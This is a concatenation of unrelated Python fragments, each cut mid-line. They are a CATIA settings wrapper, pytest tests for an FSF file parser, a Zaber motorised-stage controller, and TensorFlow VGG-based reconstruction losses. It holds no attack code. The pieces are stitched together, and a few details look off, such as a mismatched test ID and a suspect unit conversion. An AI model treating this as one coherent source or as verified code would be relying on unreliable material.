| TRUE or 1 if the 'New Part' panel is
| displayed,
| FALSE or 0 otherwise.
|
| Returns:
| S_OK if the parameter is correctly retrieved, E_FAIL otherwise.
:return: bool
:rtype: bool
"""
return self.part_infrastructure_setting_att.NewWithPanel
@new_with_panel.setter
def new_with_panel(self, value: bool):
"""
:param bool value:
"""
self.part_infrastructure_setting_att.NewWithPanel = value
@property
def only_current_operated_solid_set_in_geometry(self) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property OnlyCurrentOperatedSolidSetInGeometry() As boolean
|
| Returns or sets the "OnlyCurrentOperatedSolidSetInGeometry"
| parameter.
| Role: This parameter enables to visualize in the 3D only the current
| operated body's feature (operated means being aggregated in a boolean
| operation), as well as all other bodies and sets direcly inserted under the
| Part feature.
|
| Parameters:
|
| oDisplayed
| Current "Display in 3D only current operated solid set" parameter's
| value:
|
| TRUE or 1 if such is the visualization,
| FALSE or 0 otherwise.
|
| Returns:
| S_OK if the parameter is correctly retrieved, E_FAIL otherwise.
:return: bool
:rtype: bool
"""
return self.part_infrastructure_setting_att.OnlyCurrentOperatedSolidSetInGeometry
@only_current_operated_solid_set_in_geometry.setter
def only_current_operated_solid_set_in_geometry(self, value: bool):
"""
:param bool value:
"""
self.part_infrastructure_setting_att.OnlyCurrentOperatedSolidSetInGeometry = value
@property
def only_current_solid_set_in_geometry(self) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property OnlyCurrentSolidSetInGeometry() As boolean
|
| Returns or sets the "OnlyCurrentSolidSetInGeometry"
| parameter.
| Role: This parameter enables to visualize in the 3D only the current
| operated body's feature (operated means being aggregated in a boolean
| operation), as well as all other bodies and sets direcly inserted under the
| Part feature.
|
| Parameters:
|
| oDisplayed
| Current "Display in 3D only current operated solid set" parameter's
| value:
|
| TRUE or 1 if such is the visualization,
| FALSE or 0 otherwise.
|
| Returns:
| S_OK if the parameter is correctly retrieved, E_FAIL otherwise.
:return: bool
:rtype: bool
"""
return self.part_infrastructure_setting_att.OnlyCurrentSolidSetInGeometry
@only_current_solid_set_in_geometry.setter
def only_current_solid_set_in_geometry(self, value: bool):
"""
:param bool value:
"""
self.part_infrastructure_setting_att.OnlyCurrentSolidSetInGeometry = value
@property
def parameters_node_in_tree(self) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property ParametersNodeInTree() As boolean
|
| Returns or sets the "ParametersNodeInTree" parameter.
| Role: This parameter determines if a node called "Parameters" is created to
| contain all Knowledgeware parameters.
| Its value can be changed even after parameters have been created. The
| result is that the specification tree node display status will be
| affected.
|
| Parameters:
|
| oNodeDisplayed
| Current "ParametersNodeInTree" parameter's value:
|
| TRUE or 1 if such a node is displayed,
| FALSE or 0 otherwise.
|
| Returns:
| S_OK if the parameter is correctly retrieved, E_FAIL otherwise.
:return: bool
:rtype: bool
"""
return self.part_infrastructure_setting_att.ParametersNodeInTree
@parameters_node_in_tree.setter
def parameters_node_in_tree(self, value: bool):
"""
:param bool value:
"""
self.part_infrastructure_setting_att.ParametersNodeInTree = value
@property
def publish_topological_elements(self) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property PublishTopologicalElements() As boolean
|
| Returns or sets the "PublishTopologicalElements"
| parameter.
| Role: This parameter defines if topological elements (faces, edges,
| vertices, axes extremities) can be published.
|
| Parameters:
|
| oTopologyAllowed
| Current "PublishTopologicalElements" parameter's
| value:
|
| TRUE or 1 if topological elements can be used for
| publication,
| FALSE or 0 otherwise.
|
| Returns:
| S_OK if the parameter is correctly retrieved, E_FAIL otherwise.
:return: bool
:rtype: bool
"""
return self.part_infrastructure_setting_att.PublishTopologicalElements
@publish_topological_elements.setter
def publish_topological_elements(self, value: bool):
"""
:param bool value:
"""
self.part_infrastructure_setting_att.PublishTopologicalElements = value
@property
def relations_node_in_tree(self) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property RelationsNodeInTree() As boolean
|
| Returns or sets the "RelationsNodeInTree" parameter.
| Role: This parameter determines if a node called "Relations" is created to
| contain all Knowledgeware relations (for instance
| formulas).
| Its value can be changed even after parameters have been created. The
| result is that the specification tree node display status will be
| affected.
|
| Parameters:
|
| oNodeDisplayed
| Current "RelationsNodeInTree" parameter's value:
|
| TRUE or 1 if such a node is displayed,
| FALSE or 0 otherwise.
|
| Returns:
| S_OK if the parameter is correctly retrieved, E_FAIL otherwise.
:return: bool
:rtype: bool
"""
return self.part_infrastructure_setting_att.RelationsNodeInTree
@relations_node_in_tree.setter
def relations_node_in_tree(self, value: bool):
"""
:param bool value:
"""
self.part_infrastructure_setting_att.RelationsNodeInTree = value
@property
def replace_only_after_current(self) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property ReplaceOnlyAfterCurrent() As boolean
|
| Returns or sets the "ReplaceOnlyAfterCurrent" parameter.
| Role: This parameter defines if the replace operation can only apply to
| components located after the current object.
|
| Parameters:
|
| oOnlyAfterCurrent
| Current "ReplaceOnlyAfterCurrent" parameter's
| value:
|
| TRUE or 1 if the replace operation can only apply to components
| located after the current object,
| FALSE or 0 otherwise.
|
| Returns:
| S_OK if the parameter is correctly retrieved, E_FAIL otherwise.
:return: bool
:rtype: bool
"""
return self.part_infrastructure_setting_att.ReplaceOnlyAfterCurrent
@replace_only_after_current.setter
def replace_only_after_current(self, value: | |
fsf_data = cmdopt_raw_data
assert (fsf_data.fileHeader is not None)
# Set file header
status = fsf_write.SetFileHeader(fsf_data.fileHeader)
check_status("fsf_write.SetFileHeader", status)
assert (status == fsf.Status.SUCCESS)
# Set stream info
for streamIdx in range(fsf_data.fileHeader.nStreams):
status = fsf_write.SetStreamInfo(streamIdx, fsf_data.streamInfo[streamIdx])
assert (status == fsf.Status.SUCCESS)
check_status("fsf_write.SetStreamInfo: " + str(fsf_data.fileHeader.nStreams) + " streams.", status)
# Write optional file header
status = fsf_write.SetOptionalFileHeader(fsf_data.optFileHeader)
check_status("fsf_write.SetOptionalFileHeader", status)
assert (status == fsf.Status.SUCCESS)
# Write file comment
status = fsf_write.SetFileComment(fsf_data.fileComment)
check_status("fsf_write.SetFileComment", status)
assert (status == fsf.Status.SUCCESS)
def test_fsf_010_01(self, cmdopt_write_dir, cmdopt_raw_data):
"""
Exercise FSF 'SetFileComment' API
Instantiate FSF using write utility and call CreateFsfFile with valid FSF file name.
SetFileComment using previously instantiated fileComment with invalid values.
(size greater than the FileCommentSize)
"""
print("\n===================================================="
"\nTestFSFSetFileComment (test_fsf_010_01) : "
"\nInstantiate FSF using write utility and call CreateFsfFile with valid FSF file name. "
"SetFileComment using previously instantiated fileComment with invalid values. "
"(size greater than the FileCommentSize) ")
# Instantiate FSF Write utility
fsf_write = fsf.FSF_Common(fsf.Mode.WRITE)
# Set FSF filename
file_name = "\\test_fsf_010_01.fsf"
write_file = cmdopt_write_dir + file_name
# Create FSF file for writing
status = fsf_write.CreateFsfFile(write_file)
check_status("fsf_write.CreateFsfFile", status)
assert (status == fsf.Status.SUCCESS)
# Get data to use
fsf_data = cmdopt_raw_data
assert (fsf_data.fileHeader is not None)
# Set file header
status = fsf_write.SetFileHeader(fsf_data.fileHeader)
check_status("fsf_write.SetFileHeader", status)
assert (status == fsf.Status.SUCCESS)
# Set stream info
for streamIdx in range(fsf_data.fileHeader.nStreams):
status = fsf_write.SetStreamInfo(streamIdx, fsf_data.streamInfo[streamIdx])
assert (status == fsf.Status.SUCCESS)
check_status("fsf_write.SetStreamInfo: " + str(fsf_data.fileHeader.nStreams) + " streams.", status)
# Write optional file header
status = fsf_write.SetOptionalFileHeader(fsf_data.optFileHeader)
check_status("fsf_write.SetOptionalFileHeader", status)
assert (status == fsf.Status.SUCCESS)
# Write file comment
new_file_comment = fsf.FileComment()
new_file_comment.string = fsf_data.fileComment.string + "random string"
print(fsf_data.fileComment.string)
status = fsf_write.SetFileComment(new_file_comment)
check_status("fsf_write.SetFileComment", status)
assert (status == fsf.Status.FAILED)
def test_fsf_010_02(self, cmdopt_write_dir, cmdopt_raw_data):
"""
Exercise FSF 'SetFileComment' API
Instantiate FSF using write utility and call CreateFsfFile with valid FSF file name.
SetFileComment using previously instantiated fileComment with invalid values. (
size less than the FileCommentSize)
"""
print("\n===================================================="
"\nTestFSFSetFileComment (test_fsf_010_02) : "
"\nInstantiate FSF using write utility and call CreateFsfFile with valid FSF file name. "
"SetFileComment using previously instantiated fileComment with invalid values. "
"(size less than the FileCommentSize)")
# Instantiate FSF Write utility
fsf_write = fsf.FSF_Common(fsf.Mode.WRITE)
# Set FSF filename
file_name = "\\test_fsf_010_02.fsf"
write_file = cmdopt_write_dir + file_name
# Create FSF file for writing
status = fsf_write.CreateFsfFile(write_file)
check_status("fsf_write.CreateFsfFile", status)
assert (status == fsf.Status.SUCCESS)
# Get data to use
fsf_data = cmdopt_raw_data
assert (fsf_data.fileHeader is not None)
# Set file header
file_comment_size = fsf_data.fileHeader.FileCommentSize
fsf_data.fileHeader.FileCommentSize = 100
status = fsf_write.SetFileHeader(fsf_data.fileHeader)
check_status("fsf_write.SetFileHeader", status)
assert (status == fsf.Status.SUCCESS)
fsf_data.fileHeader.FileCommentSize = file_comment_size
# Set stream info
for streamIdx in range(fsf_data.fileHeader.nStreams):
status = fsf_write.SetStreamInfo(streamIdx, fsf_data.streamInfo[streamIdx])
assert (status == fsf.Status.SUCCESS)
check_status("fsf_write.SetStreamInfo: " + str(fsf_data.fileHeader.nStreams) + " streams.", status)
# Write optional file header
status = fsf_write.SetOptionalFileHeader(fsf_data.optFileHeader)
check_status("fsf_write.SetOptionalFileHeader", status)
assert (status == fsf.Status.SUCCESS)
# Write file comment
status = fsf_write.SetFileComment(fsf_data.fileComment)
check_status("fsf_write.SetFileComment", status)
assert (status == fsf.Status.FAILED)
def test_fsf_010_03(self, cmdopt_read_dir, cmdopt_raw_data):
"""
Exercise FSF 'SetFileComment' API
Instantiate FSF using read utility and call OpenFile.
SetFileComment using previously instantiated fileComment with valid values.
"""
print("\n===================================================="
"\nTestFSFSetFileComment (test_fsf_010_03) : "
"\nInstantiate FSF using read utility and call OpenFile. "
"SetFileComment using previously instantiated fileComment with valid values.")
# Instantiate FSF Write utility
fsf_read = fsf.FSF_Common(fsf.Mode.READ)
# Set FSF filename
# Create dummy read file
file_name = "\\test_fsf_010_03.fsf"
status = create_dummy_read_file(cmdopt_read_dir, file_name)
assert status is True
# Set FSF filename
read_file = cmdopt_read_dir + file_name
# Create FSF file for writing
status = fsf_read.OpenFile(read_file)
check_status("fsf_read.OpenFile", status)
assert (status == fsf.Status.SUCCESS)
# Get data to use
fsf_data = cmdopt_raw_data
assert (fsf_data.fileHeader is not None)
# Set file header
status = fsf_read.SetFileHeader(fsf_data.fileHeader)
check_status("fsf_write.SetFileHeader", status)
assert (status == fsf.Status.INVALID_OPERATION)
# Set stream info
for streamIdx in range(fsf_data.fileHeader.nStreams):
status = fsf_read.SetStreamInfo(streamIdx, fsf_data.streamInfo[streamIdx])
assert (status == fsf.Status.INVALID_OPERATION)
check_status("fsf_write.SetStreamInfo: " + str(fsf_data.fileHeader.nStreams) + " streams.", status)
# Write optional file header
status = fsf_read.SetOptionalFileHeader(fsf_data.optFileHeader)
check_status("fsf_write.SetOptionalFileHeader", status)
assert (status == fsf.Status.INVALID_OPERATION)
# Write file comment
status = fsf_read.SetFileComment(fsf_data.fileComment)
check_status("fsf_write.SetFileComment", status)
assert (status == fsf.Status.INVALID_OPERATION)
def test_fsf_010_04(self, cmdopt_write_dir, cmdopt_raw_data):
"""
Exercise FSF 'SetFileComment' API
Instantiate FSF using write utility and call CreateFsfFile with valid FSF file name.
WITHOUT setting the fileHeader, do SetFileComment using previously instantiated fileComment with values.
"""
print("\n===================================================="
"\nTestFSFSetFileComment (test_fsf_010_00) : "
"\nInstantiate FSF using write utility and call CreateFsfFile with valid FSF file name. "
"WITHOUT setting the fileHeader, do SetFileComment using previously instantiated "
"fileComment with values. ")
# Instantiate FSF Write utility
fsf_write = fsf.FSF_Common(fsf.Mode.WRITE)
# Set FSF filename
file_name = "\\test_fsf_010_04.fsf"
write_file = cmdopt_write_dir + file_name
# Create FSF file for writing
status = fsf_write.CreateFsfFile(write_file)
check_status("fsf_write.CreateFsfFile", status)
assert (status == fsf.Status.SUCCESS)
# Get data to use
fsf_data = cmdopt_raw_data
assert (fsf_data.fileHeader is not None)
# Set stream info
for streamIdx in range(fsf_data.fileHeader.nStreams):
status = fsf_write.SetStreamInfo(streamIdx, fsf_data.streamInfo[streamIdx])
assert (status == fsf.Status.FILE_HEADER_ERROR)
check_status("fsf_write.SetStreamInfo: " + str(fsf_data.fileHeader.nStreams) + " streams.", status)
# Write optional file header
status = fsf_write.SetOptionalFileHeader(fsf_data.optFileHeader)
check_status("fsf_write.SetOptionalFileHeader", status)
assert (status == fsf.Status.FILE_HEADER_ERROR)
# Write file comment
status = fsf_write.SetFileComment(fsf_data.fileComment)
check_status("fsf_write.SetFileComment", status)
assert (status == fsf.Status.FILE_HEADER_ERROR)
##############################
#
# FSF parser GetFileComment API test
#
class TestFSFGetFileComment:
@pytest.mark.smoke
def test_fsf_011_00(self, cmdopt_read_dir):
"""
Exercise FSF 'GetFileComment' API
Instantiate FSF using read utility and call OpenFile with valid FSF file name.
GetFileComment from an FSF file with complete data.
"""
print("\n===================================================="
"\nTestFSFGetFileComment (test_fsf_011_00) : "
"\nInstantiate FSF using read utility and call OpenFile with valid FSF file name. "
"GetFileComment from an FSF file with complete data. ")
# Instantiate FSF Write utility
fsf_read = fsf.FSF_Common(fsf.Mode.READ)
# Set FSF filename
read_file = cmdopt_read_dir + readDataFileName
# Open FSF file for writing
status = fsf_read.OpenFile(read_file)
check_status("fsf_read.OpenFile", status)
assert (status == fsf.Status.SUCCESS)
# Instantiate fsf
fsf_data = FsfData()
# Read file header
status = fsf_read.GetFileHeader(fsf_data.fileHeader)
check_status("fsf_read.GetFileHeader", status)
assert (status == fsf.Status.SUCCESS)
assert (fsf_data.fileHeader is not None)
# Read stream info
fsf_data.streamInfo = [fsf.StreamInfo()] * fsf_data.fileHeader.nStreams
for streamIdx in range(fsf_data.fileHeader.nStreams):
status = fsf_read.GetStreamInfo(streamIdx, fsf_data.streamInfo[streamIdx])
assert (status == fsf.Status.SUCCESS)
check_status("fsf_read.GetStreamInfo: " + str(fsf_data.fileHeader.nStreams) + "streams.", status)
# Read and write optional file header
status = fsf_read.GetOptionalFileHeader(fsf_data.optFileHeader)
check_status("fsf_read.GetOptionalFileHeader", status)
assert (status == fsf.Status.SUCCESS)
# Read and write file comment
status = fsf_read.GetFileComment(fsf_data.fileComment)
check_status("fsf_read.GetFileComment", status)
assert (status == fsf.Status.SUCCESS)
def test_fsf_011_01(self, cmdopt_write_dir, cmdopt_raw_data):
"""
Exercise FSF 'GetFileComment' API
Instantiate FSF using write utility and call CreateFsfFile with valid FSF file name.
GetFileComment from FSF file with incomplete data.
"""
print("\n===================================================="
"\nTestFSFGetFileComment (test_fsf_011_01) : "
"\nInstantiate FSF using write utility and call CreateFsfFile with valid FSF file name."
"GetFileComment from FSF file with complete data. ")
# Instantiate FSF Write utility
fsf_write = fsf.FSF_Common(fsf.Mode.WRITE)
# Set FSF filename
file_name = "\\test_fsf_009_01.fsf"
write_file = cmdopt_write_dir + file_name
# Create FSF file for writing
status = fsf_write.CreateFsfFile(write_file)
check_status("fsf_write.CreateFsfFile", status)
assert (status == fsf.Status.SUCCESS)
# Get data to use
fsf_data = FsfData()
assert (fsf_data.fileHeader is not None)
# Read and write optional file header
status = fsf_write.GetOptionalFileHeader(fsf_data.optFileHeader)
check_status("fsf_read.GetOptionalFileHeader", status)
assert (status == fsf.Status.INVALID_OPERATION)
# Read and write file comment
status = fsf_write.GetFileComment(fsf_data.fileComment)
check_status("fsf_read.GetFileComment", status)
assert (status == fsf.Status.INVALID_OPERATION)
def test_fsf_011_02(self, cmdopt_read_dir):
"""
Exercise FSF 'GetFileComment' API
Instantiate FSF using read utility and call OpenFile with valid FSF file name.
GetFileComment from FSF file after forced FileCommentSize as 0.
"""
print("\n===================================================="
"\nTestFSFGetFileComment (test_fsf_011_02) : "
"\nInstantiate FSF using read utility and call OpenFile with valid FSF file name."
"GetFileComment from FSF file after forced FileCommentSize as 0.")
# Instantiate FSF Write utility
fsf_read = fsf.FSF_Common(fsf.Mode.READ)
# Set FSF filename
read_file = cmdopt_read_dir + readDataFileName
# Open FSF file for writing
status = fsf_read.OpenFile(read_file)
check_status("fsf_read.OpenFile", status)
assert (status == fsf.Status.SUCCESS)
# Instantiate fsf
fsf_data = FsfData()
# Read file header
status = fsf_read.GetFileHeader(fsf_data.fileHeader)
check_status("fsf_read.GetFileHeader", status)
assert (status == fsf.Status.SUCCESS)
assert (fsf_data.fileHeader is not None)
# Read stream info
fsf_data.streamInfo = [fsf.StreamInfo()] * fsf_data.fileHeader.nStreams
for streamIdx in range(fsf_data.fileHeader.nStreams):
status = fsf_read.GetStreamInfo(streamIdx, fsf_data.streamInfo[streamIdx])
assert (status == fsf.Status.SUCCESS)
check_status("fsf_read.GetStreamInfo: " + str(fsf_data.fileHeader.nStreams) + "streams.", status)
# Read and write optional file header
status = fsf_read.GetOptionalFileHeader(fsf_data.optFileHeader)
check_status("fsf_read.GetOptionalFileHeader", status)
assert (status == fsf.Status.SUCCESS)
# Read and write file comment
fsf_data.fileHeader.FileCommentSize = | |
https://zaber.com/documents/ZaberSpeedSetting.xls
return int(self.accel_units[unit] * accel * 1.6384 * 1e-7 * 1.0 / self.microstep)
def accel_to_unit(self, accel, unit='mm/s2'):
"""
Method to convert acceleration *accel* given in micro steps per square second into *unit*
Parameters
----------
accel : int
acceleration in micro steps per square second
unit : str
unit in which acceleration should be converted. Must be in self.accel_units
"""
# Check if unit is sane; if it checks out, return same unit, else returns smallest available unit
unit = self._check_unit(unit, self.accel_units)
# Return result as float; for conversion formula see: https://zaber.com/documents/ZaberSpeedSetting.xls
return float(1.0 / self.accel_units[unit] * accel / 1.6384 * 1e7 * self.microstep)
def set_accel(self, accel, axis, unit='mm/s2'):
"""
Set the acceleration at which the axis increases speed for move rel and move abs commands
Parameters
----------
accel : float, int
acceleration; float if *unit* is given, else integer in steps
axis : zaber.serial.AsciiAxis
either self.x_axis or self.y_axis
unit : str, None
unit in which distance is given. Must be in self.dist_units. If None, get acceleration in steps / s^2
"""
# Check if axis is known
if axis not in (self.x_axis, self.y_axis):
logging.warning("Unknown axis. Abort.")
return
# If unit is given, get acceleration in steps
accel = accel if unit is None else self.accel_to_step_s2(accel, unit)
_max_accel = 32767
# Check whether speed is not larger than maxspeed
if accel > _max_accel:
msg = "Maximum acceleration of this axis is {} m/s^2." \
"Acceleration not updated!".format(self.accel_to_unit(_max_accel, 'm/s2'))
logging.warning(msg)
return
# Issue command and wait for reply and check
_reply = axis.send("set accel {}".format(accel))
self._check_reply(_reply)
return _reply
def get_accel(self, axis, unit='mm/s2'):
"""
Get the acceleration at which the axis increases speed for move rel and move abs commands
Parameters
----------
axis : zaber.serial.AsciiAxis
either self.x_axis or self.y_axis
unit : str, None
unit in which acceleration should be converted. Must be in self.accel_units.
If None, get acceleration in steps / s^2
"""
# Check if axis is known
if axis not in (self.x_axis, self.y_axis):
logging.warning("Unknown axis. Abort.")
return
# Issue command and wait for reply and check
_reply = axis.send("get accel")
success = self._check_reply(_reply)
# Get acceleration in steps per square second; 0 if command didn't succeed
accel = 0 if not success else int(_reply.data)
return accel if unit is None else self.accel_to_unit(accel, unit)
def calc_accel(self, speed, distance):
"""
Returns acceleration needed to get to *speed* in *distance*
Parameters
----------
speed : float
speed which should be matched in *distance*
distance : float
distance to travel
"""
return speed**2.0 / (2.0 * distance)
def distance_to_steps(self, distance, unit="mm"):
"""
Method to convert a *distance* given in *unit* into micro steps
Parameters
----------
distance : float
distance of travel
unit : str
unit in which distance is given. Must be in self.dist_units
"""
# Check if unit is sane; if it checks out, return same unit, else returns smallest available unit
unit = self._check_unit(unit, self.dist_units)
return int(self.dist_units[unit] / 1e3 * distance / self.microstep)
def steps_to_distance(self, steps, unit="mm"):
"""
Method to convert a *steps* given in distance given in *unit*
Parameters
----------
steps : int
distance in steps or position in steps
unit : str
unit in which distance is given. Must be in self.dist_units
"""
# Check if unit is sane; if it checks out, return same unit, else returns smallest available unit
unit = self._check_unit(unit, self.dist_units)
return float(steps * self.microstep * self.dist_units[unit] / 1e-3)
def move_relative(self, distance, axis, unit=None):
"""
Method to move either in vertical or horizontal direction relative to the current position.
Does sanity check on travel destination and axis
Parameters
----------
distance : float
distance of travel
axis : zaber.serial.AsciiAxis
either self.x_axis or self.y_axis
unit : None, str
unit in which distance is given. Must be in self.dist_units. If None, interpret as steps
"""
# Get distance in steps
dist_steps = distance if unit is None else self.distance_to_steps(distance, unit)
# Get current position
curr_pos = axis.get_position()
# Get minimum and maximum steps of travel
min_step, max_step = int(axis.send("get limit.min").data), int(axis.send("get limit.max").data)
# Vertical axis is inverted; multiply with distance with -1
if axis is self.y_axis:
dist_steps *= -1
# Check whether there's still room to move
if not min_step <= curr_pos + dist_steps <= max_step:
logging.error("Movement out of travel range. Abort!")
return
# Send command to axis and return reply
_reply = axis.move_rel(dist_steps)
self._check_reply(_reply)
# Update position
self.position = self.get_position()
return _reply
def move_absolute(self, position, axis, unit=None):
"""
Method to move along the given axis to the absolute position
Parameters
----------
position : float, int
distance of travel in steps or float with a unit
axis : zaber.serial.AsciiAxis
either self.x_axis or self.y_axis
unit : None, str
unit in which distance is given. Must be in self.dist_units. If None, interpret as steps
"""
# Get position in steps
pos_steps = position if unit is None else self.distance_to_steps(position, unit)
# Get minimum and maximum steps of travel
min_step, max_step = int(axis.send("get limit.min").data), int(axis.send("get limit.max").data)
# Check whether there's still room to move
if not min_step <= pos_steps <= max_step:
logging.error("Movement out of travel range. Abort!")
return
# Send command to axis and return reply
_reply = axis.move_abs(pos_steps)
self._check_reply(_reply)
# Update position
self.position = self.get_position()
return _reply
def prepare_scan(self, rel_start_point, rel_end_point, scan_speed, step_size, tcp_address, server):
"""
Prepares a scan by storing all needed info in self.scan_params
Parameters
----------
rel_start_point : tuple, list
iterable of starting point (x [mm], y [mm]) relative to current position, defining upper left corner of area
rel_end_point : tuple, list
iterable of end point (x [mm], y [mm]) relative to current position, defining lower right corner of area
scan_speed : float
horizontal scan speed in mm / s
step_size : float
stepp size of vertical steps in mm
tcp_address : str
tcp address to which data of stage is published during scan
server : str
IP address of server which controls the stage
"""
# Store position which is used as origin of relative coordinate system for scan
self.scan_params['origin'] = (self.x_axis.get_position(), self.y_axis.get_position())
# Store starting scan position
self.scan_params['start_pos'] = (self.scan_params['origin'][0] - self.distance_to_steps(rel_start_point[0]),
# inverted y-axis
self.scan_params['origin'][1] + self.distance_to_steps(rel_start_point[1]))
# Store end position of scan
self.scan_params['end_pos'] = (self.scan_params['origin'][0] - self.distance_to_steps(rel_end_point[0]),
# inverted y-axis
self.scan_params['origin'][1] + self.distance_to_steps(rel_end_point[1]))
# Store input args
self.scan_params['speed'] = scan_speed
self.scan_params['step_size'] = step_size
self.scan_params['tcp_address'] = tcp_address
self.scan_params['server'] = server
# Calculate number of rows for the scan
dy = self.distance_to_steps(step_size, unit='mm')
self.scan_params['n_rows'] = int(abs(self.scan_params['end_pos'][1] - self.scan_params['start_pos'][1]) / dy)
# Make dictionary with absolute position (in steps) of each row
rows = [(row, self.scan_params['start_pos'][1] - row * dy) for row in range(self.scan_params['n_rows'])]
self.scan_params['rows'] = dict(rows)
def _check_scan(self, scan_params):
"""
Method to do sanity checks on the *scan_params* dict.
Parameters
----------
scan_params : dict
dict containing all the info for doing a scan of a rectangular area.
If *scan_params* is None, use instance attribute self.scan_params instead.
"""
# Check if dict is empty or not dict
if not scan_params or not isinstance(scan_params, dict):
msg = "Scan parameter dict is empty or not of type dictionary! " \
"Try using prepare_scan method or fill missing info in dict. Abort."
logging.error(msg)
return False
# Check if scan_params dict contains all necessary info
scan_reqs = ('origin', 'start_pos', 'end_pos', 'n_rows', 'rows',
'speed', 'step_size', 'tcp_address', 'server')
missed_reqs = [req for req in scan_reqs if req not in scan_params]
# Return if info is missing
if missed_reqs:
msg = "Scan parameter dict is missing required info: {}. " \
"Try using prepare_scan method or fill missing info in dict. Abort.".format(', '.join(missed_reqs))
logging.error(msg)
return False
return True
def scan_row(self, row, speed=None, scan_params=None):
"""
Method to scan a single row of a device. Uses info about scan parameters from scan_params dict.
Does sanity checks. The actual scan is done in a separate thread which calls self._scan_row.
Parameters
----------
row : int:
Integer of row which should be scanned
speed : float, None
Scan speed in mm/s or | |
backwards to NOT change the discriminator....
crazy_hack = reconstructed_embed-reconstructed_embed_sg+tf.stop_gradient(reconstructed_embed_sg)
real_p_embed_sg, adv_true_layer = _architecture(tf.stop_gradient(real_points), reuse=True)
real_p_embed, _ = _architecture(real_points, reuse=True)
adv_fake = tf.reduce_mean(adv_fake_layer)
adv_true = tf.reduce_mean(adv_true_layer)
adv_c_loss = tf.log(adv_true) - tf.log(adv_fake)
emb_c = tf.reduce_sum(tf.square(crazy_hack - tf.stop_gradient(real_p_embed)), 1)
emb_c_loss = tf.reduce_mean(emb_c)
return adv_c_loss, emb_c_loss
def _recon_loss_using_vgg(self, opts, reconstructed_training, real_points, is_training, keep_prob):
"""Build an additional loss using a pretrained VGG in X space."""
def _architecture(_inputs, reuse=None):
_, end_points = vgg_16(_inputs, is_training=is_training, dropout_keep_prob=keep_prob, reuse=reuse)
layer_name = opts['vgg_layer']
if layer_name == 'concat':
outputs = []
for ln in ['pool1', 'pool2', 'pool3']:
output = end_points[ln]
output = flatten(output)
outputs.append(output)
output = tf.concat(outputs, 1)
elif layer_name.startswith('concat_w'):
weights = layer_name.split(',')[1:]
assert len(weights) == 5
outputs = []
for lnum in range(5):
num = lnum + 1
ln = 'pool%d' % num
output = end_points[ln]
output = flatten(output)
# We sqrt the weight here because we use L2 after.
outputs.append(np.sqrt(float(weights[lnum])) * output)
output = tf.concat(outputs, 1)
else:
output = end_points[layer_name]
output = flatten(output)
if reuse is None:
variables_to_restore = slim.get_variables_to_restore(include=['vgg_16'])
path = os.path.join(opts['data_dir'], 'vgg_16.ckpt')
# '/tmpp/models/vgg_16.ckpt'
init_assign_op, init_feed_dict = slim.assign_from_checkpoint(path, variables_to_restore)
self._additional_init_ops += [init_assign_op]
self._init_feed_dict.update(init_feed_dict)
return output
reconstructed_embed_sg = _architecture(tf.stop_gradient(reconstructed_training), reuse=None)
reconstructed_embed = _architecture(reconstructed_training, reuse=True)
# Below line enforces the forward to be reconstructed_embed and backwards to NOT change the discriminator....
crazy_hack = reconstructed_embed-reconstructed_embed_sg+tf.stop_gradient(reconstructed_embed_sg)
real_p_embed = _architecture(real_points, reuse=True)
emb_c = tf.reduce_mean(tf.square(crazy_hack - tf.stop_gradient(real_p_embed)), 1)
emb_c_loss = tf.reduce_mean(tf.sqrt(emb_c + 1e-5))
# emb_c_loss = tf.Print(emb_c_loss, [emb_c_loss], "emb_c_loss")
# # Normalize the loss, so that it does not depend on how good the
# # discriminator is.
# emb_c_loss = emb_c_loss / tf.stop_gradient(emb_c_loss)
return emb_c_loss
def _recon_loss_using_moments(self, opts, reconstructed_training, real_points, is_training, keep_prob):
"""Build an additional loss using moments."""
def _architecture(_inputs):
return compute_moments(_inputs, moments=[2]) # TODO
reconstructed_embed = _architecture(reconstructed_training)
real_p_embed = _architecture(real_points)
emb_c = tf.reduce_mean(tf.square(reconstructed_embed - tf.stop_gradient(real_p_embed)), 1)
# emb_c = tf.Print(emb_c, [emb_c], "emb_c")
emb_c_loss = tf.reduce_mean(emb_c)
return emb_c_loss * 100.0 * 100.0 # TODO: constant.
def _recon_loss_using_vgg_moments(self, opts, reconstructed_training, real_points, is_training, keep_prob):
"""Build an additional loss using a pretrained VGG in X space."""
def _architecture(_inputs, reuse=None):
_, end_points = vgg_16(_inputs, is_training=is_training, dropout_keep_prob=keep_prob, reuse=reuse)
layer_name = opts['vgg_layer']
output = end_points[layer_name]
# output = flatten(output)
output /= 255.0 # the vgg_16 method scales everything by 255.0, so we divide back here.
variances = compute_moments(output, moments=[2])
if reuse is None:
variables_to_restore = slim.get_variables_to_restore(include=['vgg_16'])
path = os.path.join(opts['data_dir'], 'vgg_16.ckpt')
# '/tmpp/models/vgg_16.ckpt'
init_assign_op, init_feed_dict = slim.assign_from_checkpoint(path, variables_to_restore)
self._additional_init_ops += [init_assign_op]
self._init_feed_dict.update(init_feed_dict)
return variances
reconstructed_embed_sg = _architecture(tf.stop_gradient(reconstructed_training), reuse=None)
reconstructed_embed = _architecture(reconstructed_training, reuse=True)
# Below line enforces the forward to be reconstructed_embed and backwards to NOT change the discriminator....
crazy_hack = reconstructed_embed-reconstructed_embed_sg+tf.stop_gradient(reconstructed_embed_sg)
real_p_embed = _architecture(real_points, reuse=True)
emb_c = tf.reduce_mean(tf.square(crazy_hack - tf.stop_gradient(real_p_embed)), 1)
emb_c_loss = tf.reduce_mean(emb_c)
# emb_c_loss = tf.Print(emb_c_loss, [emb_c_loss], "emb_c_loss")
# # Normalize the loss, so that it does not depend on how good the
# # discriminator is.
# emb_c_loss = emb_c_loss / tf.stop_gradient(emb_c_loss)
return emb_c_loss # TODO: constant.
def add_least_gaussian2d_ops(self, opts):
""" Add ops searching for the 2d plane in z_dim hidden space
corresponding to the 'least Gaussian' look of the sample
"""
with tf.variable_scope('leastGaussian2d'):
# Projection matrix which we are going to tune
sample_ph = tf.placeholder(
